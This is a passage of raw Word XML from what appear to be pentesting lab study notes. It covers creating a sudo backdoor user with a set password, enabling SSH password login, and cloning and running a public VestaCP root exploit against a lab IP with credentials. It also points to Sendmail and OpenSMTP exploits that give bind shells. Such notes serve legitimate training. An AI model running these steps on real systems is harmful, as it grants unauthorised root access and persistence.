    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003947">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find / -name proof.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003948">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003949">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ORRRRR, you can</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> add another user and add them to the sudo group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that they can run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and get a root shell. this is like adding a new user in windows and adding them to admin group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394A">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useradd -m -s /bin/bash michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>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-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → make a home dir (/home/michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>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-s /bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → give it bash as default shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394D">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Verify that there is a michael directory in /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="141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ls /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394F">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echo 'michael:SuperSecret123!' | chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003950">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Give them sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003951">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>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usermod -aG sudo michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On distros without the sudo group, you might use wheel instead:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003953">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1415"/>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usermod -aG wheel michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003954">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Check that SSH daemon is running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003955">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="141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systemctl status ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003956">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows password login:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003957">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PermitRootLogin prohibit-password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordAuthentication yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003959">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Restart sshd if you change the config:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395A">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systemctl restart ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>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ssh michael@192.168.239.156</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395C">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password is: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SuperSecret123!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>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sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395E">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and now you're root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395F">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Or you could try editing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which I've taught in the notes. This is another way to add a root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003960">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Here is how to exploit Vesta manually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1256">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://ssd-disclosure.com/ssd-advisory-vestacp-lpe-vulnerabilities/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003962">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On discord, another popular exploit used was this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003963">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1257">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/rekter0/exploits/tree/master/VestaCP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003964">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The file you want to run is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vestaROOT.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. There are multiple different exploits, but this one gets you root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003965">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried this one out, but this one requires dependency files. So instead of downloading just vestaROOT.py, you have to download the whole VestaCP directory and then run vestaROOT.py within that directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003966">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git clone</w:t>
      </w:r>
      <w:hyperlink r:id="rId1258">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="fa0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1259">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/rekter0/exploits.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003967">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cd exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003968">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cd VestaCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003969">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141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vestaROOT.py</w:t>
      </w:r>
      <w:hyperlink r:id="rId1260">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="fa0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1261">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://192.168.239.156:8083</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jack 3PUKsX98BMupBiCf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="darkBlue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make sure it's https and not http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_diqy3yq2nxk5" w:id="536"/>
      <w:bookmarkEnd w:id="536"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clamav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1262">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ClamAV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, after searching up the SMTP version (Sendmail 8.13.4/8.13.4/ exploitdb), we found this exploit which ended up opening a bind shell we can connect to via netcat and we got root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1263">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/4761</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003970">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003971">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ln757vh39s1z" w:id="537"/>
      <w:bookmarkEnd w:id="537"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zookeeper (port 2181)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003972">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003973">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1264">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pelican</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, there was a service called Zookeeper on port 2181 that you could exploit for a foothold. Very easy and quick.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003974">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003975">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003976">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jlcirsllpmon" w:id="538"/>
      <w:bookmarkEnd w:id="538"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSMTP (version of SMTP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003977">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003978">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1265">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bratarina</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw OpenSMTP (here it was version 2.0.0 but the exploit was for anything less than 6.6.2. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003979">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
